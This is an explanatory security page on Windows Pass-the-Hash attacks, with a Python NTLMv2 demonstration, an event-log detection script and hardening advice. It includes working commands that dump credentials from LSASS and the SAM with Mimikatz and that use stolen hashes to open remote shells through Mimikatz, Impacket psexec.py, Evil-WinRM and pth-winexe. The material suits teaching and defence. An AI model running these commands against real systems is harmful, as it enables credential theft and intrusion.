
Pass-the-Hash (PtH)

Pass-the-Hash (PtH) is a credential-theft technique in which an attacker obtains the NT hash of a Windows account and uses it directly to authenticate, without cracking it. It works because NTLM authentication proves possession of the hash, not of the password: the hash is a password-equivalent, so anyone holding it can answer the server's challenge. Attackers typically gain initial access via phishing or malware, obtain local administrator rights, dump hashes from memory, and then move laterally across the network, escalating privileges as they find more valuable accounts. Organizations can mitigate PtH through credential protection (Credential Guard, LSA Protection), least-privilege administration, unique local administrator passwords, restricting or disabling NTLM in favour of Kerberos, and multifactor authentication (MFA) against the initial compromise.

What is a Pass-the-Hash (PtH) Attack?
Pass-the-Hash (PtH) is a post-exploitation technique in which an attacker extracts NTLM (NT) hashes from a compromised host and presents them to other systems to authenticate, without ever recovering the plaintext password.
Why is PtH Dangerous?
●    No need to crack passwords: in NTLM the NT hash itself is the secret that the challenge-response proves, so a stolen hash is as good as the password.

●    Bypasses multifactor authentication (MFA) in practice: MFA is enforced at interactive logon, while NTLM network logons (SMB, WMI, WinRM) never prompt for a second factor.

●    Enables lateral movement in Active Directory (AD) environments: one reusable administrator hash opens every host where that account has rights.

________________________________________
How Does Pass-the-Hash (PtH) Work? (Step-by-Step)
Step 1: Attacker Gains Access to a Machine
●    The attacker compromises a system (via phishing, an exploit, or weak credentials).

●    The attacker gains local administrator privileges on the machine; these are required to read LSASS memory or the SAM hive.

Step 2: Dump NTLM Hashes from Memory or the SAM
●    The attacker extracts the NT hashes of logged-on accounts from the memory of LSASS (Local Security Authority Subsystem Service), and the hashes of local accounts from the SAM registry hive.

●    This can be done with tools such as Mimikatz, Meterpreter's hashdump, or by copying the SAM and SYSTEM hives and parsing them offline (for example with Impacket's secretsdump.py).

 Example Mimikatz Command to Dump NTLM Hashes
mimikatz.exe
privilege::debug
token::elevate
lsadump::sam

 lsadump::sam reads the local SAM hive and prints the NT hash of every local account; token::elevate impersonates SYSTEM, which lsadump::sam requires. Hashes of logged-on domain accounts live in LSASS memory and are dumped with sekurlsa::logonpasswords instead.
________________________________________
Step 3: Use the NTLM Hash to Authenticate Without a Password
●    Instead of cracking the NTLM hash, the attacker "passes" it: the NTLM client computes the challenge response from the hash, so the plaintext is never needed.

●    This grants access to servers, file shares, and Active Directory (AD) resources wherever the account has rights.

 Example PtH Attack Using Mimikatz
mimikatz.exe
sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<HASH> /run:powershell.exe

 Spawns powershell.exe in a new logon session whose NTLM credential is the supplied hash. Locally the process still runs as the current user (whoami does not change), but every outbound network authentication from it is performed as example.com\Administrator. This is the hash equivalent of runas /netonly.
________________________________________
Step 4: Lateral Movement and Privilege Escalation
●    The attacker moves across the network over SMB, WMI, or WinRM; over Remote Desktop (RDP) a hash is only usable if the target has Restricted Admin mode enabled.

●    If the compromised account has Domain Admin privileges, or the same local Administrator password is reused on many hosts, the entire network is at risk.

 Example Using Pass-the-Hash to Access Another Machine
pth-winexe -U 'DOMAIN/Administrator%aad3b435b51404eeaad3b435b51404ee:<NT-HASH>' //10.0.0.2 cmd.exe

 Executes cmd.exe on the remote machine over SMB using the stolen hash. pth-winexe expects the credential as LMHASH:NTHASH; aad3b435b51404eeaad3b435b51404ee is the constant "empty" LM hash used when no LM hash is stored.
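The four steps above describe what the tools do; the following added example (not code from the original page or from any of the tools it mentions) shows why it works, by running both sides of an NTLMv2 exchange. The user name, domain, password and challenge bytes are constructed for illustration. The client side takes only the NT hash as input, so a legitimate client that derived the hash from the typed password and an attacker who dumped the hash from LSASS produce responses the server accepts equally. A pure-Python MD4 is included because many OpenSSL builds leave hashlib without MD4.

```python
"""Both sides of an NTLMv2 challenge-response, showing that the NT hash is a
password-equivalent.  Added example for this page; names and values below are
constructed, not taken from the original text."""
import hashlib
import hmac
import os
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; needed for the NT hash and often missing from hashlib."""
    mask = 0xFFFFFFFF
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = [
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    ]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for func, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                # Each step updates one register; rotating the tuple walks a->d->c->b.
                a, b, c, d = d, rol((a + func(b, c, d) + X[idx] + k) & mask, shifts[i % 4]), b, c
        A, B, C, D = (A + a) & mask, (B + b) & mask, (C + c) & mask, (D + d) & mask
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)): what SAM/LSASS store and what Mimikatz dumps."""
    return md4(password.encode("utf-16le"))


def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NThash, UTF-16LE(UPPER(user) + domain)) (MS-NLMP 3.3.2)."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def make_blob(client_challenge: bytes, timestamp: int = 0) -> bytes:
    """Minimal NTLMv2_CLIENT_CHALLENGE (no AV pairs): type bytes, reserved, time, nonce."""
    return b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge + b"\x00" * 4


def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """Client (or attacker) side: the only secret input is the NT hash, never the password."""
    proof = hmac.new(ntowf_v2(nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def server_verify(stored_nt: bytes, user: str, domain: str, server_challenge: bytes, response: bytes) -> bool:
    """Server / domain controller side: recompute the proof from the stored NT hash."""
    proof, blob = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(stored_nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


def demo() -> tuple:
    """Returns (legit accepted, stolen-hash accepted, wrong-hash accepted)."""
    user, domain, password = "Administrator", "EXAMPLE", "Winter2024!"   # constructed
    stored = nt_hash(password)                 # held by the DC/SAM, dumped by the attacker
    server_challenge = os.urandom(8)
    # Legitimate client derives the hash from the typed password ...
    legit = ntlmv2_response(nt_hash(password), user, domain, server_challenge, make_blob(os.urandom(8)))
    # ... the attacker skips that step and feeds the dumped hash straight in.
    stolen = ntlmv2_response(stored, user, domain, server_challenge, make_blob(os.urandom(8)))
    wrong = ntlmv2_response(nt_hash("guess"), user, domain, server_challenge, make_blob(os.urandom(8)))
    return (server_verify(stored, user, domain, server_challenge, legit),
            server_verify(stored, user, domain, server_challenge, stolen),
            server_verify(stored, user, domain, server_challenge, wrong))


if __name__ == "__main__":
    print("legit, pass-the-hash, wrong hash accepted:", demo())
```

The server never learns whether the client started from a password or from the hash; that is the whole reason cracking is unnecessary and why the defences later on the page aim at keeping the hash out of the attacker's reach rather than at making it harder to crack.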
________________________________________
 

Tools Used for Pass-the-Hash (PtH) Attacks

Tool                                    | Usage
----------------------------------------|------------------------------------------------------------------
Mimikatz                                | Extract NTLM hashes from LSASS/SAM and perform PtH (sekurlsa::pth)
Impacket (psexec.py, wmiexec.py)        | Remote command execution over SMB or WMI using NTLM hashes (-hashes LM:NT)
Metasploit (exploit/windows/smb/psexec) | Automates PtH over SMB; SMBPass accepts the LM:NT hash in place of a password
pth-winexe                              | Remote command execution via SMB using NTLM hashes
Evil-WinRM                              | Remote PowerShell (WinRM) access with NTLM hashes (-H)

________________________________________
 Example PtH Commands for Each Tool
 1. Dump NTLM Hashes with Mimikatz
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

 Dumps the credentials of every logon session held in LSASS memory, including the NT hashes of logged-on domain accounts. It needs SeDebugPrivilege (privilege::debug) and fails when LSA Protection blocks the handle to LSASS; with Credential Guard the hashes are not in LSASS at all.
________________________________________
 2. Authenticate Using Impacket's psexec.py
python3 psexec.py DOMAIN/Administrator@10.0.0.2 -hashes :<NTLM-HASH>

 Opens a SYSTEM command prompt on the target using the hash. -hashes takes LMHASH:NTHASH; the LM part is left empty here. psexec.py uploads a service binary and installs a service on the target, which is noisy (a System log Event ID 7045 on the victim); wmiexec.py performs the same PtH over WMI/DCOM without dropping a file.
________________________________________
 3. Remote Execution Using Evil-WinRM
evil-winrm -i 10.0.0.2 -u Administrator -H <NTLM-HASH>

 Gains an interactive remote PowerShell session over WinRM (TCP 5985/5986) using the stolen hash; -H takes the NT hash alone.
________________________________________
 4. SMB Pass-the-Hash Attack (pth-winexe)
pth-winexe -U 'DOMAIN/Administrator%aad3b435b51404eeaad3b435b51404ee:<NT-HASH>' //10.0.0.2 cmd.exe

 Runs cmd.exe on a remote Windows machine via SMB using the stolen hash, supplied in LMHASH:NTHASH form (the LM part is the constant empty LM hash).
________________________________________
 How to Detect & Prevent Pass-the-Hash Attacks?

 Detection (Blue Team)
  •  On the source host: Event ID 4624 with Logon Type 9 (NewCredentials), Logon Process seclogo and Authentication Package Negotiate is the footprint of sekurlsa::pth (and of runas /netonly).
  •   On targets and domain controllers: Event ID 4624 with Logon Type 3 (or 10 for RDP in Restricted Admin mode) and Authentication Package NTLM, plus Event ID 4776 on the DC, for privileged accounts, especially from workstations or from hosts that normally authenticate with Kerberos.
  •   On the wire, PtH is indistinguishable from a normal NTLM logon, so a hash-based logon cannot be told apart from a password-based one; instead correlate in the SIEM for one source account or IP fanning out to many hosts in a short window.
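The three detections above, as an added example run over constructed Windows Security event records (not code or log data from the original page). The field names follow the EventData fields of Event ID 4624 (LogonType, LogonProcessName, AuthenticationPackageName, TargetUserName, IpAddress); the host names, account names, timestamps and the privileged-account watchlist are assumptions made up for the sample. Real logs carry LogonProcessName with trailing padding (for example "NtLmSsp "), which is why the comparisons strip and lower-case.

```python
"""Pass-the-Hash detection logic over constructed Security log events.
Added example for this page; EVENTS and PRIVILEGED are made up for illustration."""
from collections import defaultdict
from datetime import datetime, timedelta


def _ev(time, computer, logon_type, process, package, user, ip):
    """Helper to build a constructed Event ID 4624 record."""
    return {"time": time, "Computer": computer, "EventID": 4624, "LogonType": logon_type,
            "LogonProcessName": process, "AuthenticationPackageName": package,
            "TargetUserName": user, "TargetDomainName": "EXAMPLE", "IpAddress": ip}


EVENTS = [  # constructed sample, not real telemetry
    # Source workstation: sekurlsa::pth / runas /netonly leaves a type-9 logon by seclogo.
    _ev("2024-03-01T09:00:05", "WS01.example.com", 9, "seclogo", "Negotiate", "jdoe", "::1"),
    # Targets: NTLM network logons as Administrator fanning out from WS01 (10.0.0.50).
    _ev("2024-03-01T09:01:10", "FS01.example.com", 3, "NtLmSsp ", "NTLM", "Administrator", "10.0.0.50"),
    _ev("2024-03-01T09:01:40", "FS02.example.com", 3, "NtLmSsp ", "NTLM", "Administrator", "10.0.0.50"),
    _ev("2024-03-01T09:02:15", "SQL01.example.com", 3, "NtLmSsp ", "NTLM", "Administrator", "10.0.0.50"),
    _ev("2024-03-01T09:03:00", "WEB01.example.com", 3, "NtLmSsp ", "NTLM", "Administrator", "10.0.0.50"),
    # Benign: Kerberos network logon by a normal user from the same workstation.
    _ev("2024-03-01T09:02:30", "FS01.example.com", 3, "Kerberos", "Kerberos", "jdoe", "10.0.0.50"),
    # Benign-looking: a single NTLM logon by a service account, below the fan-out threshold.
    _ev("2024-03-01T09:05:00", "PRINT01.example.com", 3, "NtLmSsp ", "NTLM", "svc_backup", "10.0.0.80"),
]

PRIVILEGED = {"administrator"}   # constructed watchlist; in practice Domain/Enterprise Admins etc.


def _norm(value: str) -> str:
    return value.strip().lower()


def detect_netonly_logon(events):
    """4624 / LogonType 9 / seclogo / Negotiate: a process started with injected
    credentials on the source host (sekurlsa::pth or runas /netonly)."""
    return [e for e in events
            if e["EventID"] == 4624 and e["LogonType"] == 9
            and _norm(e["LogonProcessName"]) == "seclogo"
            and _norm(e["AuthenticationPackageName"]) == "negotiate"]


def _is_ntlm_network_logon(e) -> bool:
    return e["EventID"] == 4624 and e["LogonType"] == 3 and _norm(e["AuthenticationPackageName"]) == "ntlm"


def detect_ntlm_fanout(events, threshold=3, window=timedelta(minutes=10)):
    """One source IP + account reaching >= threshold distinct hosts with NTLM inside
    `window`: the lateral-movement pattern of Step 4.  One alert per (ip, user)."""
    by_key = defaultdict(list)
    for e in events:
        if _is_ntlm_network_logon(e):
            by_key[(e["IpAddress"], _norm(e["TargetUserName"]))].append(e)
    alerts = []
    for (ip, user), evs in by_key.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):              # slide the window over each start event
            start = datetime.fromisoformat(first["time"])
            hosts = {x["Computer"] for x in evs[i:]
                     if datetime.fromisoformat(x["time"]) - start <= window}
            if len(hosts) >= threshold:
                alerts.append({"rule": "ntlm_fanout", "source": ip, "user": user, "hosts": sorted(hosts)})
                break
    return alerts


def detect_privileged_ntlm(events, privileged=PRIVILEGED):
    """Any NTLM network logon by a watched privileged account; Kerberos is expected for them."""
    return [e for e in events if _is_ntlm_network_logon(e) and _norm(e["TargetUserName"]) in privileged]


def run(events=EVENTS):
    """Summarise all three detections over a batch of events."""
    return {"netonly": len(detect_netonly_logon(events)),
            "fanout": detect_ntlm_fanout(events),
            "privileged_ntlm": len(detect_privileged_ntlm(events))}


if __name__ == "__main__":
    for rule, result in run().items():
        print(rule, "->", result)
```

The fan-out rule is the one that survives contact with the "hash or password?" problem: it does not try to tell the two apart, it flags the behaviour that only makes sense for an attacker with reusable credentials. Tune threshold and window to the environment; jump hosts and backup servers that legitimately touch many machines need an allow-list.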

 Prevention (Security Hardening)

  •  Enable Windows Defender Credential Guard so the NTLM hashes of domain accounts are isolated by virtualization-based security instead of sitting readable in LSASS memory.
  •   Enable LSA Protection (HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1) so only signed protected processes can open LSASS; an attacker who can load a kernel driver can still bypass it, so treat it as a complement to Credential Guard, not a replacement.
  •   Restrict or disable NTLM where possible ("Network security: Restrict NTLM" policies) and require Kerberos; add privileged accounts to the Protected Users group, which blocks NTLM authentication for them outright.
  •   Give every host a unique local administrator password (Windows LAPS) and deny network logon to local accounts, so one dumped local hash does not open every machine.
  •   Use strong passwords + MFA to prevent the initial compromise, and keep privileged accounts off workstations (tiered administration) so their hashes are never present to be dumped.

________________________________________
Summary
●    Pass-the-Hash allows attackers to authenticate using NTLM hashes instead of passwords.

●    It’s commonly used for lateral movement and privilege escalation in AD environments.

●    Defenses include disabling NTLM, enabling Credential Guard, and monitoring suspicious logins.

